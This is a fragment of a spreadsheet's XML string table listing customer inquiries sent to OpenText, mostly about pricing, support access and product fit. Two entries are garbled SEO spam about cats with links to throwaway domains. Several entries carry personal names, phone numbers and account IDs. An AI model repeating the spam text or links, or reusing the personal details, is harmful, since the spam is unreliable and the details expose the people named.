We look forward to working with you more efficiently and speedily._x000D_
_x000D_
If you have any questions, please contact the GSK Supplier Portal Team via email at UK SUPPLIER-PORTAL or pho</t>
  </si>
  <si>
    <t>Missing November and December 2017 Invoices. Can you please send them to mishhcc@hhcc.com. Thank you</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We would like to request a trial for OpenText NFS Client &amp; NFS Solo but the form on that page: https://www.opentext.com/what-we-do/products/specialty-technologies/connectivity/nfs-client-nfs-solo is not working._x000D_
_x000D_
Will you please help us to do so?_x000D_
_x000D_
Regards,_x000D_
Tom</t>
  </si>
  <si>
    <t>I am working for Sanofi Aventis which is using Captiva Input Accel. There are 2 modules Email and Scan in Captiva which send documents to Documentum D2 application. We are facing a problem where in every 2-3 days documents get stuck in Captiva and they don;t get through to D2. Users are facing this issue from a long time and it's impacting business critically._x000D_
When document get stuck in Captiva error message says " Out of Memory can not process imgae". I think it's because of Java heap size needs to be increased but I need your expert opinion on this. Please assist._x000D_
_x000D_
Thanks,_x000D_
Nitin</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, I need to get a reseller quote for the Alberta dept of Energy for the renewals below _x000D_
_x000D_
Qty.	Item#/SKU#	Item Description_x000D_
950 Users	S-LLPGENT_M	Livelink Enterprise Suite Support Service Maintenance_x000D_
950 Users	S-LLPGMSSP_M	Content Lifecycle Maintenance (CLM) _x000D_
Services for Sharepoint_x000D_
950 Users	S-LLEXPPROTECLES_M	Enterprise Connect Plug-In for Content Server Swap from Explorer Professional Maintenance_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I have some questions about training classes and EnCE certification and I would like to know who to contact with those questions._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Det. Sears</t>
  </si>
  <si>
    <t>I'm intersted in Opentext iHub server - version for Linux. Could you be so kind and send me the price of iHub. I tried to contact Polish OpenText distributor but it was imposible._x000D_
_x000D_
Regards, Marek.</t>
  </si>
  <si>
    <t>what's the latest version of Brava Enterprise?</t>
  </si>
  <si>
    <t>Hello, the Deutsche Post Fleetmanagement is using DokuStar for archiving purposes etc. We are planning to upgrade the DokuStar version to latest version. I know that the Deutsche Post has a provider contract. What I need is a contact person who can support me regarding the DokuStar upgrade and analysis. Thank you very much in advance! Best Regards, Marcus Huber</t>
  </si>
  <si>
    <t>Hello, I'm looking for information on sentiment analysis software. Is there information you could send beyond what's on the website? Thanks!</t>
  </si>
  <si>
    <t>Use of Brava Reader.  Since it is going EOL, interested in alternative product.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,_x000D_
_x000D_
As part of Capgemini Consulting we are consulting companies on their Digital Transformation. In doing so we are in close collaboration with several clients to help them with utilizing the benefits of Robotic Process Automation._x000D_
_x000D_
Recently,  we have come across a case where the client (Retail) has an issue around scanned invoices and then manually having to allocate it to eg cost centers (invoices can not be linked to PO's). The variety of invoices would require a solution beyond simple RPA implementation._x000D_
_x000D_
As I am trying to find a solution for them, I would be interested in learning how OpenText's technology can resolve this issue._x000D_
Would you be able to provide me with more information on your ability to handle a wide variety in invoice templates? Ability to provide an integrated solution with, for example, UIpath? Indication of the costs to utilize the  technology?_x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Yaël Tassenaar_x000D_
Consultant Corporate Stratergy_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I DON'T KNOW M FAX NUMBER </t>
  </si>
  <si>
    <t>Hi there, Please would you direct me to the appropriate product for online e-rooms for the purposes of e-bundling. The primary aim is to be able to upload bundles and subsequently bundle updates for the other side of our cases to access. Is this something you can help with?</t>
  </si>
  <si>
    <t>Hello I am busy preparing a Business Requirement Document for a customer in regards of a potential VIM Implementation project._x000D_
In order to prepare this document I would like to have access to the following documents from OpenText:_x000D_
• OpenText Vendor Invoice Management for SAP Solutions - User Guide (VIM-UGD)_x000D_
• OpenText Vendor Invoice Management for SAP Solutions - Installation Guide (VIMIGD)_x000D_
• OpenText Vendor Invoice Management for SAP Solutions - Configuration Guide (VIMCGD)_x000D_
• OpenText Vendor Invoice Management for SAP Solutions - Administration Guide_x000D_
(VIM-AGD)_x000D_
• OpenText Vendor Invoice Management for SAP Solutions - Reference Guide (VIMRGD)_x000D_
• Invoice Capture Center User's Guide_x000D_
• Invoice Capture Center Customizing Guide_x000D_
• Invoice Capture Center Administrator’s Guide_x000D_
Can you help me with this?_x000D_
Regards_x000D_
Carsten Thies</t>
  </si>
  <si>
    <t>Accenture is looking at a prospective client to implement / support Documentum for content management.  In this regard we need few details if you can help –_x000D_
_x000D_
•	What are the license costs? ( One time cost and user costs)_x000D_
•	Any infrastructure requirement and approximate cost on it._x000D_
_x000D_
For eg: Content Server 7.2 &amp; D2 licence cost</t>
  </si>
  <si>
    <t>Ups, da hat sich wohl ein kleiner Fehler bei der Firmendarstellung auf Facebook eingeschlichen. Oder seit wann hat OT "12.0000" Mitarbeiter???</t>
  </si>
  <si>
    <t>Good Day _x000D_
_x000D_
kindly email me , we need to find better price than what we get from your local vendor in Saudi Arabia , who increased the prices and company looking for either better offer or we will look for another alternative applications to fulfill our users needs _x000D_
_x000D_
please come back to me ASAP _x000D_
_x000D_
Thank you _x000D_
_x000D_
Fahad</t>
  </si>
  <si>
    <t>Hi,  do you know if your Qfinity Call Recording has connect with a modern Mitel telephone system successfully?    Usually this would be via Mitels' SRC (Secure Recorder Connection) links to their MBG (Mitel Border Gateway).   We have an opportunity to work with you again in Australia..  We have several shared customers where you have the new Right Fax solutions working through our systems.  _x000D_
_x000D_
Best Regards_x000D_
_x000D_
Tom Carruthers _x000D_
+61418472506</t>
  </si>
  <si>
    <t>Hello, I am hoping that you can provide me with a list of SB/DVBE resellers of Documentum for the State of CA please?  Thank you!</t>
  </si>
  <si>
    <t>Hello,_x000D_
We're looking for a Cloud Fax service that integrates with our SAP. Can you please help us out?_x000D_
_x000D_
Thanks,_x000D_
Karun</t>
  </si>
  <si>
    <t xml:space="preserve">Good Afternoon,_x000D_
_x000D_
Can you please send our yearly statement/ any outstanding invoices for 2017 NTL this Friday, January 12? We want to make sure all payments get issued before our year end close. Please let me know if you have any questions._x000D_
_x000D_
Thanks!_x000D_
</t>
  </si>
  <si>
    <t>I have some questions about Gupta Team Developer, can you please have someone contact me?  I need to locate Object Nationalizer for CTD 6.2.</t>
  </si>
  <si>
    <t>Renewal for ACTUATE/BIRT annual maintenance.  Current contract expires 2/8/18 and former contact email address bounces back (plau@actuate.com).</t>
  </si>
  <si>
    <t>I am trying to open a support ticket for help with an issue we are having, but am unable to.</t>
  </si>
  <si>
    <t>Looking for a call recording system only. We already have a WFM solution in place.</t>
  </si>
  <si>
    <t xml:space="preserve">Help setting up support account. Previous application analyst has left the company._x000D_
SUID (Server ID):  00037-12237 and 02907-12227_x000D_
I do not know my customer ID_x000D_
</t>
  </si>
  <si>
    <t>requesting access to Westinghouse site support resources (software downloads, technical support/My Support, etc.)  Please let me know what is needed to get this implemented.  Our account representative as of 8/2017 is Justin Beachnau.</t>
  </si>
  <si>
    <t xml:space="preserve"> I am O&amp;M support for the FDA and I cannot see downloads, forums and Discussions</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to create a systems engineering management plan for my graduate project on an OpenText product. I do analytics work for a small advertising agency, and since we do not develop our own software products I would like to work on this project with a company who produces software that is interesting to me. </t>
  </si>
  <si>
    <t>We had purchased an OEM license for the Captiva Pixtools SDK a few years ago. While this works for Windows XP correctly, we face issues on Windows 7 &amp; Windows 10. Wanted to find out the options for getting an upgraded version of the SDK with the latest Windows version compatibilities or any other options. FYI, our original account manager was Mike Lendaris but not sure who the right person since the OpenText acquisition. Would appreciate if someone contacted to assist with the next steps.</t>
  </si>
  <si>
    <t>Need to know if Brava for SharePoint supports SharePoint 2016 or SharePoint Online</t>
  </si>
  <si>
    <t xml:space="preserve">Looking to understand how your products tie into SharePoint/SharePoint Online Specifically your Bravo product in regards to commenting. </t>
  </si>
  <si>
    <t>I am still unable to access the knowledge base.  I've requested the confirmation email numerous times.  I'm told you only need to give my SUID the correct rights?  Please advise ASAP.</t>
  </si>
  <si>
    <t>i'm trying to access the opentext documentum support pages and I keep going round in circles because my  account permissions are not correct. please could you help me? thank you</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
As part of Deloitte we are formalising an RFI based on early feedback from potential vendors. The client who we are in the early stages of engaging has provided a very high level list of requirements which when mapped against your  capabilities will go a long way in helping us understand your capabilities and enable us to move forward towards a formal RFI. Please can you indicate next to the requirement your solutions cover?_x000D_
_x000D_
The timelines are quite tight around this piece, so a quick response would be appreciated. _x000D_
_x000D_
Regards, _x000D_
_x000D_
J Zia._x000D_
_x000D_
_x000D_
Case Filing Management_x000D_
Case Qualification &amp; Approval_x000D_
Case Scheduling_x000D_
"Auto. Case Assignment _x000D_
&amp; Routing "_x000D_
Court Hearing Management_x000D_
Case Queuing Management_x000D_
Case Inquiry, Search, Retrieval_x000D_
Judgment Retrieval_x000D_
History Overview_x000D_
Account Management _x000D_
Multi-Case Administration_x000D_
Document Management _x000D_
Evidence &amp; Plea Filing_x000D_
Evidence Management_x000D_
Fee Payment Management_x000D_
Witness Request_x000D_
"Value-Added Service Request _x000D_
(Expert/ Translation)"_x000D_
"Court Orders &amp; _x000D_
Enforcement Management"_x000D_
"Workflow Management _x000D_
&amp; Correspondence"</t>
  </si>
  <si>
    <t>We’re looking to purchase a document generation system for our Mortgage Services business. Initially we will be generating loan modification documents including solicitations and recordable loan modification documents._x000D_
_x000D_
We leverage digital signature technology so the documents need to be generated with XMP tags for digital signature use._x000D_
_x000D_
The documents may be printed or digitally delivered so the solution should cater for that._x000D_
_x000D_
We service multiple clients all in the financial services space and 15 of the top 20 lenders in the US._x000D_
_x000D_
We need to move quickly so we’re interested in the capabilities of the solution, setup and enablement and the services available to support us during and post implementation._x000D_
_x000D_
We need to cover licensing models and licensing costs and we’re interested only in a hosted solution on our premises._x000D_
_x000D_
Come prepared to cover the features of their product and the costs and licensing. _x000D_
_x000D_
If license models are volume based then we would estimate &lt; 1M images per month initially._x000D_
_x000D_
Decision makers will be at the meetings and you can choose to come to Texas or webex, next week January 16th, 17th or 18th._x000D_
_x000D_
Other requirements below but this is not an exhaustive list._x000D_
_x000D_
_x000D_
Features_x000D_
URL_x000D_
Notes_x000D_
Global Template Components (headers, footers, images, disclaimer text, etc)_x000D_
Drag and Drop template element placement_x000D_
Variable Paragraph Styles_x000D_
Dynamically Generated Charts_x000D_
Primary data core integration (FIS)_x000D_
ADA Tagging_x000D_
Conditional Logic_x000D_
Iterative XML Compatable (Complex vs Flat XML inputs)_x000D_
Template logic can reference imported data tables_x000D_
Capable of database queries_x000D_
Import custom plug-ins_x000D_
Custom/Dynamic page breaks_x000D_
Custom/Dynamic margins_x000D_
Date, currency and value formatting_x000D_
Template versioning tracking_x000D_
User Permissions Management - Client Specific_x000D_
Displays templates that use a resource or are used by_x000D_
Image editing_x000D_
Programming language required_x000D_
Word Processor_x000D_
Additional Software Required_x000D_
Multi-tenant_x000D_
XMP Tagging/Digital Signature</t>
  </si>
  <si>
    <t>We are in the exploration stage of looking at a new CCM product to replace our Istream Document manager (Calligo) product which is no longer supported by Oracle. I wanted to reach out to you to see what your product has to offer in terms of on-premise and cloud based software to migrate all of our client output to a single solution.  The  majority of our output is produced either by Calligo or Formscape (BottomLine Technologies) which is also no longer supported.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are looking for a Fax cloud solution. _x000D_
_x000D_
Can you give us more information about this solution and what is the price involved to move our RightFax solution to the Cloud Fax solutions_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Review "shared" fax lines for being able to send directly from computer. As many as 10-20 users needing to send from a specific or multiple fax lines.</t>
  </si>
  <si>
    <t>Pricing for QTY 2 of Imaging for Windows Ver 4.0 (License Pack) Single User</t>
  </si>
  <si>
    <t>Our Belleville office is unable to access St. Louis DM documents.  They can access their own and we can access theirs.  They can access also access network drives.  We had an issue with one directional problems within the last 6-8 months and somebody there was able to log in and diagnose the problem.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Dear,_x000D_
I´ve lose my EMC support account after Opentext acquire EMC Documentum. So, I would like to request my support access again to download the new version of the Documentum._x000D_
_x000D_
What I need to do?_x000D_
_x000D_
Thank you in advance._x000D_
</t>
  </si>
  <si>
    <t>I am having difficulty loading the password required to access the Knowledge Centre and other OpenText GCdocs (Central CS, Enterprise Connect, Remote Cache)-related information.</t>
  </si>
  <si>
    <t>Password reset is not working, please investigate.</t>
  </si>
  <si>
    <t>Cost of starting an account with OpenText to be able to continue to work with Kohl's.com.</t>
  </si>
  <si>
    <t>Access to full documentation and resources</t>
  </si>
  <si>
    <t>Hello, my name is Akira. I am from Futaba North America's IT department._x000D_
_x000D_
We have been long time Brava! Reader users at my company. However, since this is the last free release of Brava Reader, we are looking to purchase Brava! Desktop TX. We have a total of 30 users using Brava Reader. I would like a quote on how much this would all cost. _x000D_
_x000D_
Thank you, Akira Wickes</t>
  </si>
  <si>
    <t xml:space="preserve">Dear all,_x000D_
_x000D_
I have a question regarding the old EMC exam E10-110 EMC Enterprise Content Management Exam._x000D_
_x000D_
I saw on community.emc.com website that this exam is retired on Jan 13, 2017 and found this list of new exams:_x000D_
_x000D_
•	Administrator – Documentum_x000D_
•	Administrator – Captiva_x000D_
•	Administrator – xPression_x000D_
•	Administrator – KazeonConsultant – Documentum_x000D_
•	Developer – Documentum – Server Programming_x000D_
•	Developer – Documentum – Web Application Programmer_x000D_
•	Developer – Documentum xCP_x000D_
_x000D_
Can you please give me the information about which exam is a substitution for the old E10-110?_x000D_
_x000D_
Thank you in advance._x000D_
_x000D_
_x000D_
Best regards,_x000D_
_x000D_
Masa Grbac_x000D_
</t>
  </si>
  <si>
    <t>I want to migrate from Notes to Outlook and need an offer for the Exchange Module. I also would like to remove the Notes Module from our Maintenance Contract.</t>
  </si>
  <si>
    <t xml:space="preserve">Urgent request of quote about ETX. _x000D_
_x000D_
Please call me ASAP. My phone is available 7:00 - 23:00 China time. _x000D_
A Chinese speaking sales is preferable. English is also okay. </t>
  </si>
  <si>
    <t>Wir sind das IT-Service Unternehmen QiTEC und suchen für einen Kunden ein Dokumentenmanagement System._x000D_
_x000D_
Dieser hat folgende IT Infrastruktur:_x000D_
- Windows 2012(R2) Server kompatibel_x000D_
- Terminal Server fähig_x000D_
- Clienten_x000D_
- 20. Nutzer_x000D_
_x000D_
Fragen:_x000D_
1. Bisheriges Dateisystem: Windows Ordner und Dateien._x000D_
Dieses soll bestehen bleiben. Ist dieses durch Ihr DMS durchsuchbar mit Schlagworten?_x000D_
2. Wie kann auf ihr DMS von Clienten zugegriffen werden? (Browser, Desktopanwendung, ...)_x000D_
3. Können die Rechte des DMS über das Active Directory System verwaltet werden?_x000D_
4. Können mehrere Dokumente über Schlagworte verknüpft werden?_x000D_
5. Ist Ihr Programm mit Microsoft Office in unterschiedlichen Versionen kompatibel? (2010, 2013 und 2016)_x000D_
6. Besitzt Ihr Programm eine eigene Scannerschnittstelle?_x000D_
7. Können Dateien per Drag&amp; Drop ins DMS gezogen werden?_x000D_
8. Hat ihr DMS Texterkennung?_x000D_
9. Hat die Suche Ihres DMS Systems logische Operatoren (UND, ODER, NICHT)?_x000D_
10. Welche Dateiformate werden vom DMS erkannt?_x000D_
11. Kann ein E-Mail Archiv, dass durchsuchbar ist, angelegt werden?</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I've a question about OpenText™ Redact-It™ Enterprise._x000D_
More so just a confirmation but is this capable of being pointed at a file server and automatically go through files? _x000D_
_x000D_
Looking forward to hearing back from you,_x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Martin Healion.</t>
  </si>
  <si>
    <t>_x000D_
Hello, _x000D_
_x000D_
I checked this article https://www.benzinga.com/pressreleases/17/12/n10966526/opentext-added-to-s-ptsx60-index_x000D_
_x000D_
_x000D_
And want to know if you are looking for some more guest posts like this? You can also forward this mail to your current SEO company, we will work together for best results for your website._x000D_
_x000D_
I'm a guest blogger and I can help you to get more guest posts on the relevant website._x000D_
_x000D_
_x000D_
Waiting for your comment_x000D_
_x000D_
_x000D_
Thanks_x000D_
Andrew Dominik_x000D_
Skype:Qualityguestpost</t>
  </si>
  <si>
    <t>We are looking for an ECM/IMS solution that will extend the capabilities offered by O365. We are manufacturing division of PMI, responsible for collaboration in about 40 factories worldwide. _x000D_
We are looking for a demo to understand how implementation of Opentext will address our challenges with information management and collaboration.</t>
  </si>
  <si>
    <t>to whom it may concern;  you recently change your moble app and I and alot of my coleges are having trouble downloading it on our phones  we work for a school district and they can even figure out why were having trouble  with the app ._x000D_
_x000D_
    thank you   Ms Hollingsworth</t>
  </si>
  <si>
    <t>problems to lgin support</t>
  </si>
  <si>
    <t>I'm head of Procure to Pay at Sony and we use OpenText for OCR globally but I'd like to speak to someone from OpenText about the performance of our first time recognition rate and find out what we can do with OpenText to improve it.</t>
  </si>
  <si>
    <t>EDI Implementation</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;h4&gt;Become aCaterpillarMechanic, Schools &amp; Training Programs Your browser indicates if you've visited this link&lt;/h4&gt;.&lt;br&gt; &lt;u&gt;LOSTCAT ! Black andGreyTabby- pts -  Your browser nidicates if you've visited this link&lt;/u&gt;.&lt;br&gt;  _x000D_
 [URL=http://bouquet-of-kittens.tk/spca-for-monterey-county/]SPCA For Monterey County[/URL] [URL=http://bouquet-of-kittens.tk/talk-about-journey/]Talk about Journey[/URL]  _x000D_
 23 РёСЋРЅ. 2017 Рі. -If yourcatwakes you up at the same time every single day, you're not alone. Here's why it ...  -Out-Loud Humor В·CatChic. Gear and Glam. Top Stories  up ? If you work nighhts or odd shifts, howdoesyourcatdeal with thawt?  Ca , Puccini, Wakes Me Up Wailing at 4:30 a.m.! I Rely  Reasons Your Cat Wakes You Up at the Same Time Every Day  Р°РІРі. 2009 Рі. -Cat Wakes Up MeowingA lot ... spent the whole timemeowingconstatly just like shedoeswhilewaking up .  catis a really happycat . she sleeps with me every night, but a few ... Our Annie, age 16,doesthat a lpt,  Can I Stop My Cat's Wake Up Calls? - The Spruce&lt;/h4&gt;.&lt;br&gt; &lt;strong&gt;how do i calm my poor kitten in heat?  Th Cat Site&lt;/strong&gt;.&lt;br&gt;  _x000D_
caterpillra cat s30 РѕС‚Р·С‹РІС‹ _x000D_
 _x000D_
 &lt;strong&gt;why does onecathell/high pitch scream at theother  screaming probably makes your ... Reason WhyCatsScream Intermittently. by Chris ... attempt to condition the animals to accepteachother ..&lt;br&gt; &lt;i&gt;JustCatsVeterinaryClinic - Veterinarian In Saratoga, NY ... Your browser indicates if you've visited this link&lt;/i&gt;.&lt;br&gt;  _x000D_
  [URL=http://door-catch-magnetic.ga/cat-mouth-infection-antibiotics/]Cat mouth infection antibiotics[/URL] [URL=http://spayed-cat-cost.tk/stop-cats-going-in-garden/]Stop cats going in garden[/URL]  _x000D_
 My cat will use his litter tray and then randomly poop on the kitchen floor, how can we stop this?.&lt;br&gt; 18 Oct 2017 ... White vinegar is great fo get rid of some odors, though it ish't always effective against cat and dog pee. Used straight from the bottle or  to Remove Cat Urine: Why an Enzyme Cleaner must eb </t>
  </si>
  <si>
    <t xml:space="preserve">We have been using the free Brava Reader for a very long time.  I see it is no longer going to be available.  I need to know what product we should buy.  We are a commercial painting contractor.  We need to be able to read files in various file types (tiff, pdf, etc.).  We do take offs by viewing blueprints with Brava Reader and measuring, etc.  Then we put everything into an Excel spreadsheet so we can price out the job.  _x000D_
We are a small office with a Windows 10 based wireless network.  We have two desktop computers and two laptops.  </t>
  </si>
  <si>
    <t xml:space="preserve">I was browsing my old domain and found a web page I created for OpenText in 1995 :)  It was the first Web Page I ever created. Back then there was little or no info about HTML.  Its still online here: http://www.ifrag.com/opentext/autosrch.html  Anyway bit of history you might be interested in. </t>
  </si>
  <si>
    <t>We are looking for a document management and revision control solution to address workflow requirements with internal and external users.  Examples include -&gt; contracts, digital proofs created in the Adobe Cloud.</t>
  </si>
  <si>
    <t xml:space="preserve">The Knowledge Center is essentially down. I get 505 errors on most pages.  I can't log a ticket for since My Support gives the same errors. </t>
  </si>
  <si>
    <t>I cannot login to OT Connect or MySupport nor can I reset my password</t>
  </si>
  <si>
    <t xml:space="preserve">Complete over the phone credit card purchase on reference number RC251641, Contract number 0012267428.  The quote we received shows tax.  Due to Government purchase, tax should Not be included._x000D_
Thank You, Kevin  </t>
  </si>
  <si>
    <t>To the Marketing/Strategy Head,_x000D_
_x000D_
Greetings from Global Market Estimates!_x000D_
_x000D_
We have published a report on Global Case Management Market Size, Share, Analysis – Forecasts To 2025._x000D_
_x000D_
Request for a sample copy of the report @: https://www.globalmarketestimates.com/case-management-market/_x000D_
_x000D_
Can we have a telephonic conversation to discuss this report?</t>
  </si>
  <si>
    <t>I need to submit formal procurement paper work to purchase "OpenText Exceed V15" and "OpenText Secure Shell 15".  Could you please provide me with "part numbers" for both.</t>
  </si>
  <si>
    <t>Our customer requesting what Time and Materials service are available from OpenText PS in respect to assisting in issues with BPM v7.6.4 after their OpenText Support contract expires end March '18 ?</t>
  </si>
  <si>
    <t>Looking for info regarding your course # 5-0151. Yesterday, I saw it advertised for Ottawa ON, beginning next week. Has it been cancelled? I no longer see it listed.</t>
  </si>
  <si>
    <t>we bought RDS VIM through SAP and has contract on this. We need support on my support</t>
  </si>
  <si>
    <t>My supplier is switching to your VAN/Services. I need to know how to keep in communications with them.</t>
  </si>
  <si>
    <t>VIM How to approve VIM Non Po invoice from email in outlook. Is there any Function module that I can call to get the inbound email to approve docid.</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon,_x000D_
_x000D_
I’m a government contractor with Booz Allen Hamilton reaching out on behalf of my client, the Department of Health and Human Services (HHS).  I’m researching MVT to possibly replace the one currently used by HHS. Based on the information available on your website I have managed to answer a lot of the questions I have, but had a few more that I was hoping you could help me with: _x000D_
•	Do you offer a free trial period for us to test out your tool?_x000D_
•	As this will be paid for through Government funds, we have a very limited budget. Can you give me an estimate of the costs we would be looking, including setup cost, monthly/ yearly costs etc?_x000D_
o	Can you also confirm if you offer Government rates?_x000D_
•	Does your tool allow us to run experiments on desktop, mobile and tablet devices?_x000D_
•	Will you be able to offer a demo of your tool?_x000D_
_x000D_
Thanks in advance for your help,_x000D_
_x000D_
Mo_x000D_
</t>
  </si>
  <si>
    <t>To do RFx</t>
  </si>
  <si>
    <t>I am a consultant working with a client to identify potential ECM solutions to replace their current custom document management applications.  I would like to schedule a a call with sales to share information and determine the high level viability of the OpenText solution.</t>
  </si>
  <si>
    <t>Looking for a RightFax vendor to help us upgrade from RightFax 9.4 to RightFax Cloud_x000D_
Please contact me as soon as possible.</t>
  </si>
  <si>
    <t>Our research team is looking into scanning as an option to collecting data. We would like to gather a few quotes from different scanning companies that we can add to our grant budget proposal._x000D_
I used to use Teleform (under Cardiff) until 5 years ago. We had a support contract but it has since lapsed._x000D_
I prefer communication to be email or chat so that I can present it to my manager._x000D_
_x000D_
Thank you_x000D_
Heather</t>
  </si>
  <si>
    <t xml:space="preserve">I wanted to see if your SSV software would work for the medical device industry. Also would working with a small (less than 40 employees) medical device company be something that opentext would be interested in?_x000D_
</t>
  </si>
  <si>
    <t>Every time we try to upload our GXS Template, we get an error that says our UPC is too long, which it is not. I will be happy to send you the templates that we are attempting to upload. Thanks!</t>
  </si>
  <si>
    <t>We are a former RightFax partner and one of our customers would like to add additional FOIP ports to their existing RightFax Enterprise Server.  We were looking to get some pricing information and direction on how to assist them in purchasing the additional FOIP port licenses._x000D_
_x000D_
Thank you,_x000D_
Jonathan</t>
  </si>
  <si>
    <t>Need to confirm Rightfax works with Black Knight MSP before we consider Rightfax solution. In order to fax we would need to assign the Rightfax server IP to an MSP print queue. This sounds like we would need to host the server internally. However BK says they developed their solution in conjunction with Rightfax and it wasn't restricted to local host - i.e. could host externally. Is there someone we can discuss this with?</t>
  </si>
  <si>
    <t>Our opentext fax appliance will not pick up incoming faxes. Confirmed the phone line is working fine.</t>
  </si>
  <si>
    <t>Received this email below...can you please tell me what the latest version of rightfax is  we are using 10.5.0.896_x000D_
_x000D_
OpenText™ RightFax ™ 16 Enhancement Pack 2, Service Release 2 is Now Available!</t>
  </si>
  <si>
    <t>Researching pricing on EMC Captiva Invoice Capture solution.</t>
  </si>
  <si>
    <t>I need activation code for profile ID: R5HY-4NHI-PXUX-7QWW-Z83G-WX4N-62G and server ID: 112816.</t>
  </si>
  <si>
    <t>We need help with some information about a new costumer that we’ll be have, please let me know if can you help us with this.</t>
  </si>
  <si>
    <t>C what ur offering</t>
  </si>
  <si>
    <t>I don't find documentum related software downloads in support.opentext.com site.Whai is the exact link I should use to download softwares ?</t>
  </si>
  <si>
    <t>Requesting information for license options to support 400 systems for Brava Desktop.  We will require the same functionality for viewing/annotating TIFF images currently included in the expiring Brava Reader.  License option will have to be on-prem and not require an internet connection due to internal security controls.</t>
  </si>
  <si>
    <t>Checking it out</t>
  </si>
  <si>
    <t xml:space="preserve">Information on the software for our department to use for our electronics records management program. </t>
  </si>
  <si>
    <t>technical overview and pricing discussion</t>
  </si>
  <si>
    <t>Interested in automation of AP invoices, storing, recognition of text on PDFs received, storing, matching to POs</t>
  </si>
  <si>
    <t xml:space="preserve">We have a Castelle 2500 and are using Faxpress 9.0.1 software for it on a XP pc._x000D_
I understand that you might have virtual software available that we could upgrade to.  Is that correct?_x000D_
Thank you,_x000D_
Summer_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are currently using right fax within our company but I have some questions on some of your add on modules. Please call me at 786-594-6453. Thank you . Samantha Woodard. HIM/Release of Information Management. </t>
  </si>
  <si>
    <t>For one of our prospective client, we are looking for an integration with the RightFax. In this regard, we are looking for if there is any developer edition of the RightFax which can be purchased. If not, what is the minimum license needed for performing the same.</t>
  </si>
  <si>
    <t>My EMC account was created in 2007. Now after migration to OpenText , I see my details in OpenText with different account created in 2002 and belonged to someone else._x000D_
I can not see my discussion nor I can open any Documentum discussion._x000D_
What to do?_x000D_
Thanks in advance</t>
  </si>
  <si>
    <t>I work in planning group at Expec computer center , At Saudi Aramco oil Co , and we would like if we can purchase Exceed through you , we are getting price issues with vendors providing the product , at Saudi Aramco we have more than 1000 licenses , and we are seriously looking for other alternatives products if we can't get a good price offer _x000D_
_x000D_
kindly let me know the price per license  for both Exceed , Exceed 3D_x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are already OT products have license to use VIM, ICC and ADA._x000D_
Now our business team wants to explore Enterprise Scan, Document Pipeline  and ISIS Printer Drivers. Can you please let us know the licensing requirement and cost associated with it?_x000D_
_x000D_
Thanks._x000D_
_x000D_
Kind Regards_x000D_
Anand</t>
  </si>
  <si>
    <t>I've requested a trial version of "OpenText Exceed_x000D_
onDemand 8 SP9" and was contacted by a Sales person before the Christmas break. I'm still awaiting, so could you please update me on the progress?</t>
  </si>
  <si>
    <t>Wish to enquire about whether Open Text is formerly known as Captaris workflow as we need a Captaris workflow solution for our concern. Kindly provide India contact details for better understanding.</t>
  </si>
  <si>
    <t>I am working with Stuart MacDonald and need access to download FP29 for our Captiva Servers? Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Requesting a demo for infocenter and the pricing. </t>
  </si>
  <si>
    <t>I need a quotation for Spicer imagenation and Myraid-Informative graphics.</t>
  </si>
  <si>
    <t>I would like to know the products/support provided by OpenText for integration with SharePoint 2013 search, preferably indexing done in SharePoint._x000D_
_x000D_
Please let me know your suggestions._x000D_
_x000D_
Best Regards,_x000D_
Sowmya</t>
  </si>
  <si>
    <t>Hi OpenText Team,_x000D_
_x000D_
I am from Air Products company, SAP development department. I am current working on the OpenText support role._x000D_
_x000D_
I am writing to request full access to My Support where software, patches, documentation, forums, complete Knowledge Base Articles are available. However, I don't know the information of the request form. Could you help me out to grant me the access, or guide me through the process. Thanks much in advance!_x000D_
_x000D_
Best regards,_x000D_
Kevin Tang</t>
  </si>
  <si>
    <t>Hello,_x000D_
I would like to setup an onsite class for 3-0300 OpenText Directory Services (OTDS) Integration and Configuration v16 . Could you contact me ? thank you</t>
  </si>
  <si>
    <t>Hello OpenText,_x000D_
Please allow me to introduce myself. My name is Michael and I am working for Softshell AG, a German value-add distributor for cybersecurity. We help companies to kick-start and grow their business in the DACH (Germany, Austria, Switzerland) region._x000D_
As a part of that, we publish the Softshell Vendor Report, a comprehensive and premium market overview of all the cybersecurity vendors. We calculate an individual Vendor Score for each company, which assures the best possible presentation and positioning in the market. Up to this point, we cover 1,700+ companies. And you are a part of it._x000D_
We are currently working on the 4th edition of the Report and we have yet to calculate a score for you. In order to achieve a high-class exposition for OpenText I would kindly ask you to fill out our Vendor Information Form. Is there an email address I can send the Vendor Information Form to?_x000D_
Being featured in the Report is 100% cost-free for you._x000D_
If you have any questions, please do not hesitate to let me know. _x000D_
Thank you and best regards,</t>
  </si>
  <si>
    <t>Potential new customer for OpenText Content Server</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;h4&gt;Howmany times adayshouldcatspoop? Is 2-3 times normal? Your browser indicates if you've visited this link&lt;/h4&gt;.&lt;br&gt; &lt;h2&gt;UnderstandingCatBehavioras a Radar of His Health Your browser indicates fi you've visited this link&lt;/h2&gt;.&lt;br&gt;  _x000D_
 [URL=http://when-a-cat-licks-you.ml/indoor-outdoor-cat-training/]Indoor outdoor cat training[/URL] [URL=http://cat-claw-marks.gq/is-there-anything-you-can-spray-to-keep-cats-away/]Is there anything you can spray to keep cats away[/URL]  _x000D_
